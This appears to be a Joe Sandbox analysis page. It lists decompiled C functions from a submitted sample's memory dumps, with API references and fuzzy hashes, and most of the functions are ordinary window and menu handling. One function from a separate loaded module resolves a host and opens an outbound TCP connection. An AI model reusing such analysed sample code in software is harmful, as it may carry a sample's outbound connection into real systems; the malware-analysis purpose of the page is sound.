                                                                                                                                                                                                                                                                                          0x00100627
                                                                                                                                                                                                                                                                                          0x00100632
                                                                                                                                                                                                                                                                                          0x0010063a
                                                                                                                                                                                                                                                                                          0x0010063c
                                                                                                                                                                                                                                                                                          0x00100648
                                                                                                                                                                                                                                                                                          0x0010065d
                                                                                                                                                                                                                                                                                          0x00100661
                                                                                                                                                                                                                                                                                          0x00100661
                                                                                                                                                                                                                                                                                          0x00100648
                                                                                                                                                                                                                                                                                          0x00100672
                                                                                                                                                                                                                                                                                          0x00100672
                                                                                                                                                                                                                                                                                          0x001005a9
                                                                                                                                                                                                                                                                                          0x001005aa
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001005b0
                                                                                                                                                                                                                                                                                          0x001005b7
                                                                                                                                                                                                                                                                                          0x001005bd
                                                                                                                                                                                                                                                                                          0x001005bd
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32 ref: 001005A1
                                                                                                                                                                                                                                                                                          • RemoveMenu.USER32(?,-00000001,00000400), ref: 001005B7
                                                                                                                                                                                                                                                                                          • DestroyMenu.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000FFDF9), ref: 001005C5
                                                                                                                                                                                                                                                                                          • MapWindowPoints.USER32 ref: 001005F1
                                                                                                                                                                                                                                                                                          • PeekMessageA.USER32(?,?,00000201,00000201,00000000), ref: 0010062E
                                                                                                                                                                                                                                                                                          • PtInRect.USER32(?,?,?), ref: 00100640
                                                                                                                                                                                                                                                                                          • PeekMessageA.USER32(00000000,?,00000201,00000201,00000001), ref: 00100661
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Menu$MessagePeek$CountDestroyItemPointsRectRemoveWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 638675735-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 55833e45416d3b894b2b2f528eaa32937a64d307a33e80b4dd381bf90c051153
                                                                                                                                                                                                                                                                                          • Instruction ID: 61146ef48f3c4470f793c610dc0d910bc4915d1cefe5a378a932cedc1b7c2f20
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55833e45416d3b894b2b2f528eaa32937a64d307a33e80b4dd381bf90c051153
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73311C75E00218AFDB05CFA4DD85EEEBBF5AF4C710F008159E914AB290D7B0A941CFA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                          			E000F8070(void* __esi) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				void* _v108;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t16;
                                                                                                                                                                                                                                                                                          				int _t21;
                                                                                                                                                                                                                                                                                          				int _t23;
                                                                                                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                                                                                                          				intOrPtr _t33;
                                                                                                                                                                                                                                                                                          				intOrPtr _t36;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t43;
                                                                                                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                                                          				signed int _t47;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t46 = __esi;
                                                                                                                                                                                                                                                                                          				_t16 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t16 ^ _t47;
                                                                                                                                                                                                                                                                                          				_t45 = wsprintfA;
                                                                                                                                                                                                                                                                                          				wsprintfA( &_v108, "Row: %i",  *((intOrPtr*)(__esi + 0x2a0)) + 1);
                                                                                                                                                                                                                                                                                          				_t33 =  *((intOrPtr*)(__esi + 0x248));
                                                                                                                                                                                                                                                                                          				_t31 = SendMessageA;
                                                                                                                                                                                                                                                                                          				_t21 = 0;
                                                                                                                                                                                                                                                                                          				if(_t33 > 0) {
                                                                                                                                                                                                                                                                                          					_t43 =  *((intOrPtr*)(__esi + 0x24c));
                                                                                                                                                                                                                                                                                          					while( *_t43 != 0xefdb) {
                                                                                                                                                                                                                                                                                          						_t21 = _t21 + 1;
                                                                                                                                                                                                                                                                                          						_t43 = _t43 + 4;
                                                                                                                                                                                                                                                                                          						if(_t21 < _t33) {
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_t21 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t46 + 0x228), 0x401, _t21,  &_v108);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L7:
                                                                                                                                                                                                                                                                                          				_t42 =  &_v108;
                                                                                                                                                                                                                                                                                          				wsprintfA( &_v108, "Col: %i",  *((intOrPtr*)(_t46 + 0x2a4)) + 1);
                                                                                                                                                                                                                                                                                          				_t36 =  *((intOrPtr*)(_t46 + 0x248));
                                                                                                                                                                                                                                                                                          				_t23 = 0;
                                                                                                                                                                                                                                                                                          				if(_t36 <= 0) {
                                                                                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                                                                                          					return E001059E6(0, _t31, _v8 ^ _t47, _t42, _t45, _t46);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t42 =  *(_t46 + 0x24c);
                                                                                                                                                                                                                                                                                          					while(_t42->i != 0xefdc) {
                                                                                                                                                                                                                                                                                          						_t23 = _t23 + 1;
                                                                                                                                                                                                                                                                                          						_t42 = _t42 + 4;
                                                                                                                                                                                                                                                                                          						if(_t23 < _t36) {
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							return E001059E6(0, _t31, _v8 ^ _t47, _t42, _t45, _t46);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_t23 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          						_t42 =  *(_t46 + 0x228);
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t46 + 0x228), 0x401, _t23,  &_v108);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L14;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L15:
                                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                                          0x000f8070
                                                                                                                                                                                                                                                                                          0x000f8076
                                                                                                                                                                                                                                                                                          0x000f807d
                                                                                                                                                                                                                                                                                          0x000f8088
                                                                                                                                                                                                                                                                                          0x000f8099
                                                                                                                                                                                                                                                                                          0x000f809b
                                                                                                                                                                                                                                                                                          0x000f80a1
                                                                                                                                                                                                                                                                                          0x000f80aa
                                                                                                                                                                                                                                                                                          0x000f80ae
                                                                                                                                                                                                                                                                                          0x000f80b0
                                                                                                                                                                                                                                                                                          0x000f80b6
                                                                                                                                                                                                                                                                                          0x000f80be
                                                                                                                                                                                                                                                                                          0x000f80bf
                                                                                                                                                                                                                                                                                          0x000f80c4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f80c6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f80c4
                                                                                                                                                                                                                                                                                          0x000f80cb
                                                                                                                                                                                                                                                                                          0x000f80de
                                                                                                                                                                                                                                                                                          0x000f80de
                                                                                                                                                                                                                                                                                          0x000f80cb
                                                                                                                                                                                                                                                                                          0x000f80e0
                                                                                                                                                                                                                                                                                          0x000f80e8
                                                                                                                                                                                                                                                                                          0x000f80f1
                                                                                                                                                                                                                                                                                          0x000f80f3
                                                                                                                                                                                                                                                                                          0x000f80fc
                                                                                                                                                                                                                                                                                          0x000f8100
                                                                                                                                                                                                                                                                                          0x000f8142
                                                                                                                                                                                                                                                                                          0x000f8153
                                                                                                                                                                                                                                                                                          0x000f8102
                                                                                                                                                                                                                                                                                          0x000f8102
                                                                                                                                                                                                                                                                                          0x000f8108
                                                                                                                                                                                                                                                                                          0x000f8110
                                                                                                                                                                                                                                                                                          0x000f8111
                                                                                                                                                                                                                                                                                          0x000f8116
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f8119
                                                                                                                                                                                                                                                                                          0x000f8129
                                                                                                                                                                                                                                                                                          0x000f8129
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f8116
                                                                                                                                                                                                                                                                                          0x000f812d
                                                                                                                                                                                                                                                                                          0x000f812f
                                                                                                                                                                                                                                                                                          0x000f8140
                                                                                                                                                                                                                                                                                          0x000f8140
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f812d
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 000F8099
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00000000,?), ref: 000F80DE
                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 000F80F1
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00000000,?), ref: 000F8140
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSendwsprintf
                                                                                                                                                                                                                                                                                          • String ID: Col: %i$Row: %i
                                                                                                                                                                                                                                                                                          • API String ID: 3751067900-1661183516
                                                                                                                                                                                                                                                                                          • Opcode ID: b1d25342870b6f75dee136e5319438aa215cbf9019c4a5d3a30e13764eca53e3
                                                                                                                                                                                                                                                                                          • Instruction ID: ec281ec5f1ca38c62eafcdf49868ae7a87c047bbf3742111e3f48df9c1c75761
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1d25342870b6f75dee136e5319438aa215cbf9019c4a5d3a30e13764eca53e3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD21CF302102089FDB68CA68DC85AFBB3E9FB88320F508A2DE55AD7590DF70E885D740
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                                                                                                                          			E0400A090(signed int __eax, intOrPtr _a4, signed short _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                                                                                          				signed char _v8;
                                                                                                                                                                                                                                                                                          				short _v12;
                                                                                                                                                                                                                                                                                          				signed char _v13;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                                          				short _v34;
                                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                                                                                                          				char* _t42;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(6);
                                                                                                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                                                                                                          				_push(2);
                                                                                                                                                                                                                                                                                          				L0400B210();
                                                                                                                                                                                                                                                                                          				_v20 = __eax;
                                                                                                                                                                                                                                                                                          				if(_v20 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          					_v36 = 2;
                                                                                                                                                                                                                                                                                          					_push(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                                                          					L0400B20A();
                                                                                                                                                                                                                                                                                          					_v34 = 2;
                                                                                                                                                                                                                                                                                          					_push(_a4);
                                                                                                                                                                                                                                                                                          					L0400B204();
                                                                                                                                                                                                                                                                                          					_v12 = 2;
                                                                                                                                                                                                                                                                                          					if(_v12 == 0) {
                                                                                                                                                                                                                                                                                          						return 0xffffffffffffffff;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc))))));
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          					_v13 = 0;
                                                                                                                                                                                                                                                                                          					_v40 = 0;
                                                                                                                                                                                                                                                                                          					while(_v40 < _a12) {
                                                                                                                                                                                                                                                                                          						_push(0x10);
                                                                                                                                                                                                                                                                                          						_t42 =  &_v36;
                                                                                                                                                                                                                                                                                          						_push(_t42);
                                                                                                                                                                                                                                                                                          						_push(_v20);
                                                                                                                                                                                                                                                                                          						L0400B1FE();
                                                                                                                                                                                                                                                                                          						if(_t42 != 0) {
                                                                                                                                                                                                                                                                                          							_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v13 = 1;
                                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if((_v13 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						if(_a16 != 0) {
                                                                                                                                                                                                                                                                                          							_v44 = _a16;
                                                                                                                                                                                                                                                                                          							_push(4);
                                                                                                                                                                                                                                                                                          							_push( &_v44);
                                                                                                                                                                                                                                                                                          							_push(0x1005);
                                                                                                                                                                                                                                                                                          							_push(0xffff);
                                                                                                                                                                                                                                                                                          							_push(_v20);
                                                                                                                                                                                                                                                                                          							L0400B1F2();
                                                                                                                                                                                                                                                                                          							_push(4);
                                                                                                                                                                                                                                                                                          							_push( &_v44);
                                                                                                                                                                                                                                                                                          							_push(0x1006);
                                                                                                                                                                                                                                                                                          							_push(0xffff);
                                                                                                                                                                                                                                                                                          							_push(_v20);
                                                                                                                                                                                                                                                                                          							L0400B1F2();
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						return _v20;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t40 = _v20;
                                                                                                                                                                                                                                                                                          					_push(_t40);
                                                                                                                                                                                                                                                                                          					L0400B1F8();
                                                                                                                                                                                                                                                                                          					return _t40 | 0xffffffff;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v20;
                                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                                          0x0400a096
                                                                                                                                                                                                                                                                                          0x0400a098
                                                                                                                                                                                                                                                                                          0x0400a09a
                                                                                                                                                                                                                                                                                          0x0400a09c
                                                                                                                                                                                                                                                                                          0x0400a0a1
                                                                                                                                                                                                                                                                                          0x0400a0a8
                                                                                                                                                                                                                                                                                          0x0400a0b7
                                                                                                                                                                                                                                                                                          0x0400a0bf
                                                                                                                                                                                                                                                                                          0x0400a0c0
                                                                                                                                                                                                                                                                                          0x0400a0c5
                                                                                                                                                                                                                                                                                          0x0400a0cc
                                                                                                                                                                                                                                                                                          0x0400a0cd
                                                                                                                                                                                                                                                                                          0x0400a0d2
                                                                                                                                                                                                                                                                                          0x0400a0d9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400a0ea
                                                                                                                                                                                                                                                                                          0x0400a0e5
                                                                                                                                                                                                                                                                                          0x0400a0f2
                                                                                                                                                                                                                                                                                          0x0400a0f9
                                                                                                                                                                                                                                                                                          0x0400a0fd
                                                                                                                                                                                                                                                                                          0x0400a10f
                                                                                                                                                                                                                                                                                          0x0400a117
                                                                                                                                                                                                                                                                                          0x0400a119
                                                                                                                                                                                                                                                                                          0x0400a11c
                                                                                                                                                                                                                                                                                          0x0400a120
                                                                                                                                                                                                                                                                                          0x0400a121
                                                                                                                                                                                                                                                                                          0x0400a128
                                                                                                                                                                                                                                                                                          0x0400a10c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400a10c
                                                                                                                                                                                                                                                                                          0x0400a12a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400a12a
                                                                                                                                                                                                                                                                                          0x0400a138
                                                                                                                                                                                                                                                                                          0x0400a14c
                                                                                                                                                                                                                                                                                          0x0400a151
                                                                                                                                                                                                                                                                                          0x0400a154
                                                                                                                                                                                                                                                                                          0x0400a159
                                                                                                                                                                                                                                                                                          0x0400a15a
                                                                                                                                                                                                                                                                                          0x0400a15f
                                                                                                                                                                                                                                                                                          0x0400a167
                                                                                                                                                                                                                                                                                          0x0400a168
                                                                                                                                                                                                                                                                                          0x0400a16d
                                                                                                                                                                                                                                                                                          0x0400a172
                                                                                                                                                                                                                                                                                          0x0400a173
                                                                                                                                                                                                                                                                                          0x0400a178
                                                                                                                                                                                                                                                                                          0x0400a180
                                                                                                                                                                                                                                                                                          0x0400a181
                                                                                                                                                                                                                                                                                          0x0400a181
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400a186
                                                                                                                                                                                                                                                                                          0x0400a13a
                                                                                                                                                                                                                                                                                          0x0400a13d
                                                                                                                                                                                                                                                                                          0x0400a13e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400a143
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 0400A09C
                                                                                                                                                                                                                                                                                          • htons.WS2_32(?), ref: 0400A0C0
                                                                                                                                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 0400A0CD
                                                                                                                                                                                                                                                                                          • connect.WS2_32(000000FF,?,00000010), ref: 0400A121
                                                                                                                                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 0400A13E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 530611402-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                                          • Instruction ID: a070b3506782e3d460d1e62e3f028d70face053f71bdd0f6ca274d7f1f380b7b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65312B70B00319ABEB10EFE4D845BFEB7B5AF98314F108659E5217B2C0E7B5A940CB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                          			E000FD220(void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v28;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				signed int _t34;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t36;
                                                                                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t60 = __esi;
                                                                                                                                                                                                                                                                                          				_t59 = __edi;
                                                                                                                                                                                                                                                                                          				_t34 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v12 = _t34 ^ _t61;
                                                                                                                                                                                                                                                                                          				_t36 =  *(__esi + 0x24);
                                                                                                                                                                                                                                                                                          				_t49 = GetWindowLongA;
                                                                                                                                                                                                                                                                                          				if(_t36 != 0 && (GetWindowLongA(_t36, 0xfffffff0) & 0x10000000) != 0) {
                                                                                                                                                                                                                                                                                          					if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          						SendMessageA( *(__esi + 0x24), 5, 0, 0);
                                                                                                                                                                                                                                                                                          						InvalidateRect( *(__esi + 0x24), 0, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t56 =  &_v28;
                                                                                                                                                                                                                                                                                          					_v28.left = 0;
                                                                                                                                                                                                                                                                                          					_v28.top = 0;
                                                                                                                                                                                                                                                                                          					_v28.right = 0;
                                                                                                                                                                                                                                                                                          					_v28.bottom = 0;
                                                                                                                                                                                                                                                                                          					GetWindowRect( *(_t60 + 0x24),  &_v28);
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t59 + 4)) =  *((intOrPtr*)(_t59 + 4)) + _v28.bottom - _v28.top;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t37 =  *(_t60 + 0x28);
                                                                                                                                                                                                                                                                                          				if(_t37 != 0 && (_t37 & 0x10000000) != 0) {
                                                                                                                                                                                                                                                                                          					if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t60 + 0x28), 5, 0, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v28.top = 0;
                                                                                                                                                                                                                                                                                          					_v28.right = 0;
                                                                                                                                                                                                                                                                                          					_v28.bottom = 0;
                                                                                                                                                                                                                                                                                          					_v28.left = 0;
                                                                                                                                                                                                                                                                                          					_t37 = GetWindowRect( *(_t60 + 0x28),  &_v28);
                                                                                                                                                                                                                                                                                          					_t56 = _v28.top - _v28.bottom;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t59 + 0xc)) =  *((intOrPtr*)(_t59 + 0xc)) + _v28.top - _v28.bottom;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return E001059E6(_t37, _t49, _v12 ^ _t61, _t56, _t59, _t60);
                                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                                          0x000fd220
                                                                                                                                                                                                                                                                                          0x000fd220
                                                                                                                                                                                                                                                                                          0x000fd226
                                                                                                                                                                                                                                                                                          0x000fd22d
                                                                                                                                                                                                                                                                                          0x000fd230
                                                                                                                                                                                                                                                                                          0x000fd234
                                                                                                                                                                                                                                                                                          0x000fd23c
                                                                                                                                                                                                                                                                                          0x000fd24e
                                                                                                                                                                                                                                                                                          0x000fd25a
                                                                                                                                                                                                                                                                                          0x000fd268
                                                                                                                                                                                                                                                                                          0x000fd268
                                                                                                                                                                                                                                                                                          0x000fd270
                                                                                                                                                                                                                                                                                          0x000fd273
                                                                                                                                                                                                                                                                                          0x000fd276
                                                                                                                                                                                                                                                                                          0x000fd279
                                                                                                                                                                                                                                                                                          0x000fd27c
                                                                                                                                                                                                                                                                                          0x000fd284
                                                                                                                                                                                                                                                                                          0x000fd290
                                                                                                                                                                                                                                                                                          0x000fd290
                                                                                                                                                                                                                                                                                          0x000fd293
                                                                                                                                                                                                                                                                                          0x000fd298
                                                                                                                                                                                                                                                                                          0x000fd2aa
                                                                                                                                                                                                                                                                                          0x000fd2b6
                                                                                                                                                                                                                                                                                          0x000fd2b6
                                                                                                                                                                                                                                                                                          0x000fd2c1
                                                                                                                                                                                                                                                                                          0x000fd2c4
                                                                                                                                                                                                                                                                                          0x000fd2c7
                                                                                                                                                                                                                                                                                          0x000fd2cf
                                                                                                                                                                                                                                                                                          0x000fd2d6
                                                                                                                                                                                                                                                                                          0x000fd2df
                                                                                                                                                                                                                                                                                          0x000fd2e2
                                                                                                                                                                                                                                                                                          0x000fd2e2
                                                                                                                                                                                                                                                                                          0x000fd2f3

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 000FD241
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000005,00000000,00000000), ref: 000FD25A
                                                                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 000FD268
                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 000FD284
                                                                                                                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 000FD29D
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000005,00000000,00000000), ref: 000FD2B6
                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 000FD2D6
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
